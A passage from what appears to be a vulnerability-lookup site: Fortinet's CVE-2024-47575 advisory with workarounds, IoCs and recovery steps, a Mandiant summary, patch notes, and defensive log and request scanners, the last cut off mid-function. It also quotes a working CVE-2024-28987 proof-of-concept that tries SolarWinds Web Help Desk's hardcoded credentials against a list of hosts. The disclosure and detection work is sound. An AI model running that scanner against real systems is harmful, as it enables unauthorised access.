FortiManager 7.0         7.0.0 through 7.0.12     Upgrade to 7.0.13 or above
FortiManager 6.4         6.4.0 through 6.4.14     Upgrade to 6.4.15 or above
FortiManager 6.2         6.2.0 through 6.2.12     Upgrade to 6.2.13 or above
FortiManager Cloud 7.6   Not affected             Not Applicable
FortiManager Cloud 7.4   7.4.1 through 7.4.4      Upgrade to 7.4.5 or above
FortiManager Cloud 7.2   7.2.1 through 7.2.7      Upgrade to 7.2.8 or above
FortiManager Cloud 7.0   7.0.1 through 7.0.12     Upgrade to 7.0.13 or above
FortiManager Cloud 6.4   6.4 all versions         Migrate to a fixed release

Old FortiAnalyzer models 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E with the following feature enabled (FortiManager on FortiAnalyzer):

config system global
    set fmg-status enable
end

and at least one interface with fgfm service enabled are also impacted by this vulnerability.

Workarounds

Upgrade to a fixed version or use one of the following workarounds, depending on the version you're running:

1- For FortiManager versions 7.0.12 or above, 7.2.5 or above, 7.4.3 or above (but not 7.6.0), prevent unknown devices from attempting to register:

config system global
(global)# set fgfm-deny-unknown enable
(global)# end

Warning: With this setting enabled, be aware that if a FortiGate's SN is not in the device list, FortiManager will prevent it from connecting to register upon being deployed, even when a model device with PSK is matching.

If FAZ features are enabled on FMG, block the addition of unauthorized devices via syslog:

conf system global
    set detect-unregistered-log-device disable
end

If FortiGate Updates or Web Filtering are enabled, block the addition of unauthorized devices via FDS:

conf fmupdate fds-setting
    set unreg-dev-option ignore
end

2- Alternatively, for FortiManager versions 7.2.0 and above, you may add local-in policies to whitelist the IP addresses of FortiGates that are allowed to connect.

Example:

config system local-in-policy
    edit 1
        set action accept
        set dport 541
        set src <IP addresses of the allowed FortiGates>
    next
    edit 2
        set dport 541
    next
end

3- For 7.2.2 and above, 7.4.0 and above, 7.6.0 and above it is also possible to use a custom certificate which will mitigate the issue:

config system global
    set fgfm-ca-cert <custom CA certificate>
    set fgfm-cert-exclusive enable
end

And install that certificate on FortiGates. Only this CA will be valid; this can act as a workaround, provided the attacker cannot obtain a certificate signed by this CA via an alternate channel.

NB: For FortiManager versions 6.2, 6.4, and 7.0.11 and below, please upgrade to one of the versions above and apply the above workarounds.

Indicators of Compromise

The following are possible IoCs:

Log entries

type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",user="device,…",msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" sessionid=0 operation="Add device" performedon="localhost" changes="Unregistered device localhost add succeeded"

type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",user="System",userfrom="",msg="" adom="root" sessionid=0 operation="Modify device" performedon="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"

IP addresses

  • 45.32.41.202
  • 104.238.141.143
  • 158.247.199.37
  • 45.32.63.2
  • 195.85.114.78 (Not observed by Fortinet, reported by Mandiant here)

Serial Number

FMG-VMTM23017412

Files

  • /tmp/.tm
  • /var/tmp/.tm

Note that file IoCs may not appear in all cases.

Risk

The identified actions of this attack in the wild have been to automate via a script the exfiltration of various files from the FortiManager which contained the IPs, credentials and configurations of the managed devices.

At this stage, we have not received reports of any low-level system installations of malware or backdoors on these compromised FortiManager systems. To the best of our knowledge, there have been no indicators of modified databases, or connections and modifications to the managed devices.

Recovery

A FortiManager configuration backup file would not contain any OS or system-level file changes, as these files are not included in the archive. Therefore, taking a backup from a compromised system and then restoring it on a fresh or re-initialized one would not carry over and re-introduce such low-level changes. When taking this approach, be aware that the data may have been tampered with. Careful review should be done to confirm configuration accuracy.

The methods below assume that the managed devices (FortiGates or other) contained in the backup have not been tampered with and that their configurations are reliable. Event log activity verification of the FortiGates should be reviewed starting from the date of the identified IoCs, to determine if there were any unauthorized access or configuration changes. Since data may have been exfiltrated from the FortiManager database, we recommend that the credentials, such as passwords and user-sensitive data, of all managed devices, be urgently changed.

For VM installations, recovery can be facilitated by keeping a copy of the compromised FortiManager in an isolated network with no Internet connection, as well as configuring it in offline mode and closed-network mode operation (see settings below). This system can be used to compare with the new one which will be set up in parallel.

config system admin setting
set offline_mode enable
end
config fmupdate publicnetwork
set status disable
end

Recovery Methods

Option 1 – Recommended Recovery Action

This method ensures that the FortiManager configuration was not tampered with. It will require database rebuilding or device configuration resynchronizations at the Device and Policy Package ADOM levels.

• Installing a fresh FortiManager VM or re-initializing a hardware model and adding/discovering the devices.
• Installing a fresh FortiManager VM or re-initializing a hardware model, and restoring a backup taken before the IoC detection.

Option 2 – Alternative Recovery Action

This method provides a quick recovery, where partial or no database rebuilding/resynchronization is required. It requires that you manually verify the accuracy of the currently running FortiManager configuration.

• Installing a fresh FortiManager VM or re-initializing a hardware model and restoring/copying components or configuration sections from a compromised FortiManager.
• Installing a fresh FortiManager VM or re-initializing a hardware model, and restoring a backup from a compromised FortiManager.

For more info on data configuration and synchronization procedures: https://community.fortinet.com/t5/FortiManager/Technical-Tip-FortiManager-data-configuration-and/ta-p/351748


{
   uuid: "9baa9351-dc32-4f7d-b01d-eeb3a51e50be",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "(Vendor information) Missing authentication in fgfmsd",
   description: "A missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.\n\nReports have shown this vulnerability to be exploited in the wild.\n\nPSIRT | FortiGuard Labs\n9–11 minutes\nSummary\n\nA missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.\n\nReports have shown this vulnerability to be exploited in the wild.\nVersion \tAffected \tSolution\nFortiManager 7.6 \t7.6.0 \tUpgrade to 7.6.1 or above\nFortiManager 7.4 \t7.4.0 through 7.4.4 \tUpgrade to 7.4.5 or above\nFortiManager 7.2 \t7.2.0 through 7.2.7 \tUpgrade to 7.2.8 or above\nFortiManager 7.0 \t7.0.0 through 7.0.12 \tUpgrade to 7.0.13 or above\nFortiManager 6.4 \t6.4.0 through 6.4.14 \tUpgrade to 6.4.15 or above\nFortiManager 6.2 \t6.2.0 through 6.2.12 \tUpgrade to 6.2.13 or above\nFortiManager Cloud 7.6 \tNot affected \tNot Applicable\nFortiManager Cloud 7.4 \t7.4.1 through 7.4.4 \tUpgrade to 7.4.5 or above\nFortiManager Cloud 7.2 \t7.2.1 through 7.2.7 \tUpgrade to 7.2.8 or above\nFortiManager Cloud 7.0 \t7.0.1 through 7.0.12 \tUpgrade to 7.0.13 or above\nFortiManager Cloud 6.4 \t6.4 all versions \tMigrate to a fixed release\n\nOld FortiAnalyzer models 1000E, 1000F, 2000E, 3000E, 3000F, 3000G, 3500E, 3500F, 3500G, 3700F, 3700G, 3900E with the following feature enabled (FortiManager on FortiAnalyzer):\n\nconfig system global\nset fmg-status enable\nend\n\nand at least one interface with fgfm service enabled are also impacted by this vulnerability.\n\nWorkarounds\n\nUpgrade to a fixed version or use one of the following workarounds, depending on the version you're running:\n\n1- For FortiManager versions 7.0.12 or above, 7.2.5 or above, 7.4.3 or above (but not 7.6.0), prevent unknown devices to 
attempt to register:\n\nconfig system global\n(global)# set fgfm-deny-unknown enable\n(global)# end\n\nWarning: With this setting enabled, be aware that if a FortiGate's SN is not in the device list, FortiManager will prevent it from connecting to register upon being deployed, even when a model device with PSK is matching.\n\nIf FAZ features are enabled on FMG, block the addition of unauthorized devices via syslog:\n\nconf system global\nset detect-unregistered-log-device disable\nend\n\nIf FortiGate Updates or Web Filtering are enabled, block the addition of unauthorized devices via FDS:\n\nconf fmupdate fds-setting\nset unreg-dev-option ignore\nend\n\n2- Alternatively, for FortiManager versions 7.2.0 and above, you may add local-in policies to whitelist the IP addresses of FortiGates that are allowed to connect.\n\nExample:\n\nconfig system local-in-policy\nedit 1\nset action accept\nset dport 541\nset src\nnext\nedit 2\nset dport 541\nnext\nend\n\n3- For 7.2.2 and above, 7.4.0 and above, 7.6.0 and above it is also possible to use a custom certificate which will mitigate the issue:\n\nconfig system global\nset fgfm-ca-cert\nset fgfm-cert-exclusive enable\n\nend\n\nAnd install that certificate on FortiGates. 
Only this CA will be valid, this can act as a workaround, providing the attacker cannot obtain a certificate signed by this CA via an alternate channel.\n\nNB: For FortiManager versions 6.2, 6.4, and 7.0.11 and below, please upgrade to one of the versions above and apply the above workarounds.\n\nIndicators of Compromise\n\nThe following are possible IoCs:\n\nLog entries\n\ntype=event,subtype=dvm,pri=information,desc=\"Device,manager,generic,information,log\",user=\"device,...\",msg=\"Unregistered device localhost add succeeded\" device=\"localhost\" adom=\"FortiManager\" session_id=0 operation=\"Add device\" performed_on=\"localhost\" changes=\"Unregistered device localhost add succeeded\"\n\ntype=event,subtype=dvm,pri=notice,desc=\"Device,Manager,dvm,log,at,notice,level\",user=\"System\",userfrom=\"\",msg=\"\" adom=\"root\" session_id=0 operation=\"Modify device\" performed_on=\"localhost\" changes=\"Edited device settings (SN FMG-VMTM23017412)\"\n\nIP addresses\n\n45.32.41.202\n104.238.141.143\n158.247.199.37\n45.32.63.2\n195.85.114.78 (Not observed by Fortinet, reported by Mandiant here)\n\nSerial Number\n\nFMG-VMTM23017412\n\nFiles\n\n/tmp/.tm\n/var/tmp/.tm\n\nNote that file IoCs may not appear in all cases.\n\nRisk\n\nThe identified actions of this attack in the wild have been to automate via a script the exfiltration of various files from the FortiManager which contained the IPs, credentials and configurations of the managed devices.\n\nAt this stage, we have not received reports of any low-level system installations of malware or backdoors on these compromised FortiManager systems. To the best of our knowledge, there have been no indicators of modified databases, or connections and modifications to the managed devices.\n\nRecovery\n\nA FortiManager configuration backup file would not contain any OS or system-level file\nchanges, as these files are not included in the archive. 
Therefore, taking a backup from a\ncompromised system and then restoring it on a fresh or re-initialized one, would not carry\nover and re-introduce such low-level changes. When taking this approach, be aware that the\ndata may have been tampered with. Careful review should be done to confirm configuration\naccuracy.\n\nThe methods below assume that the managed devices (FortiGates or other) contained in the\nbackup have not been tampered with and that their configurations are reliable. Event log\nactivity verification of the FortiGates should be reviewed starting from the date of the\nidentified IoCs, to determine if there were any unauthorized access or configuration changes.\nSince data may have been exfiltrated from the FortiManager database, we recommend that\nthe credentials, such as passwords and user-sensitive data, of all managed devices, be\nurgently changed.\n\nFor VM installations, recovery can be facilitated by keeping a copy of the compromised\nFortiManager in an isolated network with no Internet connection, as well as configuring it in\noffline mode and closed-network mode operation (see settings below). This system can be\nused to compare with the new one which will be set up in parallel.\n\nconfig system admin setting\nset offline_mode enable\nend\nconfig fmupdate publicnetwork\nset status disable\nend\n\nRecovery Methods\n\nOption 1 – Recommended Recovery Action\n\nThis method ensures that the FortiManager configuration was not tampered with. 
It will\nrequire database rebuilding or device configuration resynchronizations at the Device and\nPolicy Package ADOM levels.\n\n• Installing a fresh FortiManager VM or re-initializing a hardware model and\nadding/discovering the devices.\n• Installing a fresh FortiManager VM or re-initializing a hardware model, and restoring a\nbackup taken before the IoC detection.\n\nOption 2 – Alternative Recovery Action\n\nThis method provides a quick recovery, where partial or no database\nrebuilding/resynchronization is required. It requires that you manually verify accuracy of the\ncurrently running FortiManager configuration\n\n• Installing a fresh FortiManager VM or re-initializing a hardware model and\nrestoring/copying components or configuration sections from a compromised\nFortiManager.\n• Installing a fresh FortiManager VM or re-initializing a hardware model, and restoring a\nbackup from a compromised FortiManager.\n\nFor more info on data configuration and synchronization procedures: https://community.fortinet.com/t5/FortiManager/Technical-Tip-FortiManager-data-configuration-and/ta-p/351748\n\n\n\n- [https://www.fortiguard.com/psirt/FG-IR-24-423](https://www.fortiguard.com/psirt/FG-IR-24-423)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-10-25T07:11:40.672278+00:00",
   timestamp: "2024-10-25T07:11:40.672278+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

cve-2024-47575
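
Added example (not part of the Fortinet advisory or of the comment above): a small Python scanner that parses FortiManager key=value event-log lines and flags the three IoC classes the advisory lists: the "Add device" of a device calling itself localhost, the attacker-side serial FMG-VMTM23017412, and the published IP addresses matched as whole IPv4 tokens. The first two sample lines are the ones quoted in the advisory; the remaining sample lines are constructed for this demonstration and are not real FortiManager output. The parser handles only the field layout those two advisory lines show, and the function and rule names are mine.

```python
"""Scan FortiManager event-log lines for the CVE-2024-47575 IoCs from FG-IR-24-423."""
import re
from typing import Dict, List, Tuple

# IoCs copied from the advisory text: attacker-side serial number and IP addresses.
IOC_SERIAL = "FMG-VMTM23017412"
IOC_IPS = {
    "45.32.41.202",
    "104.238.141.143",
    "158.247.199.37",
    "45.32.63.2",
    "195.85.114.78",  # reported by Mandiant, not observed by Fortinet
}

# key=value pairs: the value is either double-quoted (may contain spaces and
# commas) or a bare token ending at the next comma or whitespace.
_KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|[^\s,]*)')
# whole IPv4 tokens only, so 45.32.63.2 does not match inside 45.32.63.20
_IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def parse_fmg_log(line: str) -> Dict[str, str]:
    """Parse one FortiManager event-log line into a field dict.

    The leading fields are comma-separated (type=event,subtype=dvm,...) and the
    trailing ones space-separated; one key=value regex covers both.
    """
    fields: Dict[str, str] = {}
    for key, raw in _KV.findall(line):
        if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
            raw = raw[1:-1]
        fields[key] = raw
    return fields


def check_line(line: str) -> List[str]:
    """Return the names of the IoC rules that fire on one log line."""
    f = parse_fmg_log(line)
    hits: List[str] = []
    # Rule 1: a dvm "Add device" where the registering device is "localhost",
    # the pattern of the unauthorised FortiManager registration in the advisory.
    if (f.get("subtype") == "dvm" and f.get("operation") == "Add device"
            and "localhost" in (f.get("device"), f.get("performed_on"))):
        hits.append("rogue-localhost-add")
    # Rule 2: the attacker-side serial number anywhere on the line.
    if IOC_SERIAL in line:
        hits.append("ioc-serial")
    # Rule 3: any published IoC IP present as a whole IPv4 token.
    for ip in sorted(set(_IPV4.findall(line)) & IOC_IPS):
        hits.append(f"ioc-ip:{ip}")
    return hits


def scan(lines) -> List[Tuple[int, List[str]]]:
    """Run every line through check_line; return (line_number, hits) for matches."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := check_line(line))]


SAMPLE_LOGS = [
    # the two log entries quoted in FG-IR-24-423
    'type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",'
    'user="device,...",msg="Unregistered device localhost add succeeded" device="localhost" '
    'adom="FortiManager" session_id=0 operation="Add device" performed_on="localhost" '
    'changes="Unregistered device localhost add succeeded"',
    'type=event,subtype=dvm,pri=notice,desc="Device,Manager,dvm,log,at,notice,level",'
    'user="System",userfrom="",msg="" adom="root" session_id=0 operation="Modify device" '
    'performed_on="localhost" changes="Edited device settings (SN FMG-VMTM23017412)"',
    # constructed: a legitimate device registration (not real FortiManager output)
    'type=event,subtype=dvm,pri=information,desc="Device,manager,generic,information,log",'
    'user="admin",msg="Device FGT60F-BRANCH add succeeded" device="FGT60F-BRANCH" adom="root" '
    'session_id=1427 operation="Add device" performed_on="FGT60F-BRANCH" changes="Device add succeeded"',
    # constructed: an IoC IP appearing in a message field
    'type=event,subtype=system,pri=notice,desc="System,login",user="admin",'
    'msg="Login from 45.32.63.2 succeeded"',
    # constructed: a near-miss address that must not match
    'type=event,subtype=system,pri=notice,desc="System,login",user="admin",'
    'msg="Login from 45.32.63.20 succeeded"',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOGS):
        print(f"line {number}: {', '.join(hits)}")
```

Run against an exported FortiManager event log one line at a time; the serial and IP rules are deliberately independent of field names so they still fire on log formats the parser does not fully understand.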

Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575) on cve-2024-47575
5 months ago by Alexandre Dulaunoy

In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, CVE-2024-47575 / FG-IR-24-423, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices.

Mandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.

At this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. As additional information becomes available through our investigations, Mandiant will update this blog’s attribution assessment.

Organizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.

Ref: https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575


{
   uuid: "55eb3309-c5c3-4f89-bdbd-e3ffa97ab779",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Investigating FortiManager Zero-Day Exploitation (CVE-2024-47575)",
   description: "In October 2024, Mandiant collaborated with Fortinet to investigate the mass exploitation of FortiManager appliances across 50+ potentially compromised FortiManager devices in various industries. The vulnerability, CVE-2024-47575 / FG-IR-24-423, allows a threat actor to use an unauthorized, threat actor-controlled FortiManager device to execute arbitrary code or commands against vulnerable FortiManager devices. \n\nMandiant observed a new threat cluster we now track as UNC5820 exploiting the FortiManager vulnerability as early as June 27, 2024. UNC5820 staged and exfiltrated the configuration data of the FortiGate devices managed by the exploited FortiManager. This data contains detailed configuration information of the managed appliances as well as the users and their FortiOS256-hashed passwords. This data could be used by UNC5820 to further compromise the FortiManager, move laterally to the managed Fortinet devices, and ultimately target the enterprise environment.\n\nAt this time, the data sources analyzed by Mandiant did not record the specific requests that the threat actor used to leverage the FortiManager vulnerability. Additionally, at this stage of our investigations there is no evidence that UNC5820 leveraged the obtained configuration data to move laterally and further compromise the environment. As a result, at the time of publishing, we lack sufficient data to assess actor motivation or location. As additional information becomes available through our investigations, Mandiant will update this blog’s attribution assessment.\n\nOrganizations that may have their FortiManager exposed to the internet should conduct a forensic investigation immediately.\n\nRef:  [https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575](https://cloud.google.com/blog/topics/threat-intelligence/fortimanager-zero-day-exploitation-cve-2024-47575)",
   description_format: "markdown",
   vulnerability: "CVE-2024-47575",
   creation_timestamp: "2024-10-24T08:04:32.724240+00:00",
   timestamp: "2024-10-24T08:05:11.171573+00:00",
   related_vulnerabilities: [
      "CVE-2024-47575",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
      {},
   ],
}

cve-2024-47575

Patches released previously did not completely mitigate the vulnerability on cve-2024-38812
5 months ago by Cédric Bonhomme

VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability.

https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968


{
   uuid: "a3186180-3808-47e1-8347-071389b4f994",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Patches released previously did not completely mitigate the vulnerability",
   description: "VMware has determined that the vCenter patches released previously did not completely mitigate the vulnerability.\n\nhttps://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968",
   description_format: "markdown",
   vulnerability: "CVE-2024-38812",
   creation_timestamp: "2024-10-22T13:20:32.036514+00:00",
   timestamp: "2024-10-22T13:20:32.036514+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
      {
         resources: [
            "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968",
         ],
      },
   ],
}

cve-2024-38812

Availability of a patch on cve-2024-28987
5 months ago by Cédric Bonhomme

The company released a patch in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw.


{
   uuid: "f9ef410e-5884-4a57-a0d5-a3a16d9ff8fa",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Availability of a patch",
   description: "The company released [a patch](https://solarwindscore.my.site.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2?language=en_US) in Web Help Desk version 12.8.3 HF2, which addresses this vulnerability. Users are strongly advised to update their software to this version or later to protect against this flaw.",
   description_format: "markdown",
   vulnerability: "CVE-2024-28987",
   creation_timestamp: "2024-10-18T22:25:32.495082+00:00",
   timestamp: "2024-10-18T22:26:03.012172+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
         resources: [
            "https://solarwindscore.my.site.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2",
         ],
      },
   ],
}

cve-2024-28987

Proof-of-Concept on cve-2024-28987
5 months ago by Cédric Bonhomme

A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC

import argparse
import base64
import requests

# Created by Ghost sec.
RED = "\033[91m"
GREEN = "\033[92m"
BOLD = "\033[1m"
RESET = "\033[0m"

ascii_art = f"""
{BOLD}{RED}
  ______   __                              __                                         
 /      \ /  |                            /  |                                        
/$$$$$$  |$$ |____    ______    _______  _$$ |_           _______   ______    _______ 
$$ | _$$/ $$      \  /      \  /       |/ $$   |         /       | /      \  /       |
$$ |/    |$$$$$$$  |/$$$$$$  |/$$$$$$$/ $$$$$$/         /$$$$$$$/ /$$$$$$  |/$$$$$$$/ 
$$ |$$$$ |$$ |  $$ |$$ |  $$ |$$      \   $$ | __       $$      \ $$    $$ |$$ |      
$$ \__$$ |$$ |  $$ |$$ \__$$ | $$$$$$  |  $$ |/  |       $$$$$$  |$$$$$$$$/ $$ \_____ 
$$    $$/ $$ |  $$ |$$    $$/ /     $$/   $$  $$/       /     $$/ $$       |$$       |
 $$$$$$/  $$/   $$/  $$$$$$/  $$$$$$$/     $$$$/        $$$$$$$/   $$$$$$$/  $$$$$$$/ 
 PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel
{RESET}
"""

print(ascii_art)

def get_basic_auth_header(username, password):
    credentials = f"{username}:{password}"
    base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8')
    return {'Authorization': f'Basic {base64_credentials}'}

def scan_target(hostname):
    # Ensure hostname does not have trailing slashes
    hostname = hostname.strip().rstrip('/')
    url = f"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/"

    # Print formatted URL for debugging
    print(f"{BOLD}[*] Scanning URL: {url}{RESET}")

    headers = get_basic_auth_header("helpdeskIntegrationUser", "dev-C4F8025E7")
    headers['Content-Type'] = 'application/x-www-form-urlencoded'

    try:
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text:
            print(f"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}")
        else:
            print(f"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}")
    except requests.RequestException:
        # Modify this line to just print "Not vulnerable" instead of the error details
        print(f"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}")

def scan_targets_from_file(file_path):
    try:
        with open(file_path, 'r') as file:
            targets = file.readlines()
            if not targets:
                print(f"{BOLD}{RED}[!] No targets found in file{RESET}")
                return
            for target in targets:
                target = target.strip()
                if target:
                    scan_target(target)
    except FileNotFoundError:
        print(f"{BOLD}{RED}[!] File {file_path} not found{RESET}")
    except Exception as e:
        print(f"{BOLD}{RED}[!] An error occurred: {e}{RESET}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential")
    parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets')

    args = parser.parse_args()

    scan_targets_from_file(args.file)

if __name__ == "__main__":
    main()


{
   uuid: "20187f45-138c-48ba-b11f-52dc3ddfd69e",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Proof-of-Concept",
   description: "A PoC is available here: https://github.com/fa-rrel/CVE-2024-28987-POC\n\n\n```python\nimport argparse\nimport base64\nimport requests\n\n# Created by Ghost sec.\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\nascii_art = f\"\"\"\n{BOLD}{RED}\n  ______   __                              __                                         \n /      \\ /  |                            /  |                                        \n/$$$$$$  |$$ |____    ______    _______  _$$ |_           _______   ______    _______ \n$$ | _$$/ $$      \\  /      \\  /       |/ $$   |         /       | /      \\  /       |\n$$ |/    |$$$$$$$  |/$$$$$$  |/$$$$$$$/ $$$$$$/         /$$$$$$$/ /$$$$$$  |/$$$$$$$/ \n$$ |$$$$ |$$ |  $$ |$$ |  $$ |$$      \\   $$ | __       $$      \\ $$    $$ |$$ |      \n$$ \\__$$ |$$ |  $$ |$$ \\__$$ | $$$$$$  |  $$ |/  |       $$$$$$  |$$$$$$$$/ $$ \\_____ \n$$    $$/ $$ |  $$ |$$    $$/ /     $$/   $$  $$/       /     $$/ $$       |$$       |\n $$$$$$/  $$/   $$/  $$$$$$/  $$$$$$$/     $$$$/        $$$$$$$/   $$$$$$$/  $$$$$$$/ \n PROOF OF CONCEPT CVE-2024-28987 || SCANNING VULNERABILITY POC || github.com/fa-rrel\n{RESET}\n\"\"\"\n\nprint(ascii_art)\n\ndef get_basic_auth_header(username, password):\n    credentials = f\"{username}:{password}\"\n    base64_credentials = base64.b64encode(credentials.encode()).decode('utf-8')\n    return {'Authorization': f'Basic {base64_credentials}'}\n\ndef scan_target(hostname):\n    # Ensure hostname does not have trailing slashes\n    hostname = hostname.strip().rstrip('/')\n    url = f\"http://{hostname}/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/\"\n    \n    # Print formatted URL for debugging\n    print(f\"{BOLD}[*] Scanning URL: {url}{RESET}\")\n    \n    headers = get_basic_auth_header(\"helpdeskIntegrationUser\", \"dev-C4F8025E7\")\n    headers['Content-Type'] = 'application/x-www-form-urlencoded'\n    \n    try:\n        response = requests.get(url, 
headers=headers, timeout=10)\n        if response.status_code == 200 and 'displayClient' in response.text and 'shortDetail' in response.text:\n            print(f\"{BOLD}{GREEN}[+] Vulnerability confirmed on {hostname} with username: 'helpdeskIntegrationUser' and password: 'dev-C4F8025E7'{RESET}\")\n        else:\n            print(f\"{BOLD}{RED}[-] No vulnerability detected on {hostname}{RESET}\")\n    except requests.RequestException:\n        # Modify this line to just print \"Not vulnerable\" instead of the error details\n        print(f\"{BOLD}{RED}[-] Not vulnerable on {hostname}{RESET}\")\n\ndef scan_targets_from_file(file_path):\n    try:\n        with open(file_path, 'r') as file:\n            targets = file.readlines()\n            if not targets:\n                print(f\"{BOLD}{RED}[!] No targets found in file{RESET}\")\n                return\n            for target in targets:\n                target = target.strip()\n                if target:\n                    scan_target(target)\n    except FileNotFoundError:\n        print(f\"{BOLD}{RED}[!] File {file_path} not found{RESET}\")\n    except Exception as e:\n        print(f\"{BOLD}{RED}[!] An error occurred: {e}{RESET}\")\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"CVE-2024-28987 Scanner - SolarWinds Web Help Desk Hardcoded Credential\")\n    parser.add_argument('-f', '--file', type=str, required=True, help='File containing list of targets')\n\n    args = parser.parse_args()\n    \n    scan_targets_from_file(args.file)\n\nif __name__ == \"__main__\":\n    main()\n```",
   description_format: "markdown",
   vulnerability: "CVE-2024-28987",
   creation_timestamp: "2024-10-18T22:23:39.387177+00:00",
   timestamp: "2024-10-18T22:23:49.363557+00:00",
   related_vulnerabilities: [
      "CVE-2024-28987",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

cve-2024-28987
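
Added example (not part of the PoC or of the comment above): the defender-side counterpart of the scanner, in Python. It parses a captured HTTP request head, decodes the Basic Authorization header, and flags any request presenting the hardcoded helpdeskIntegrationUser / dev-C4F8025E7 account, while also separating authenticated from unauthenticated hits on the /helpdesk/WebObjects/Helpdesk.woa/ra/ REST path the PoC requests. The credential and path are those used by the PoC; the sample requests are constructed for this demonstration and are not real captures, and the function names and verdict labels are mine.

```python
"""Flag HTTP requests that use the hardcoded Web Help Desk integration account
exercised by the CVE-2024-28987 PoC."""
import base64
import binascii
import hmac
from typing import Dict, List, Optional, Tuple

# Credential and REST path exactly as the PoC above uses them.
HARDCODED_USER = "helpdeskIntegrationUser"
HARDCODED_PASS = "dev-C4F8025E7"
WHD_REST_PREFIX = "/helpdesk/WebObjects/Helpdesk.woa/ra/"


def basic_header(user: str, password: str) -> str:
    """Build an Authorization header value; used here to construct sample traffic."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic_auth(value: str) -> Optional[Tuple[str, str]]:
    """Decode 'Basic <base64(user:password)>'; return None for anything malformed."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def parse_request(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.x request head into (method, path, lower-cased headers)."""
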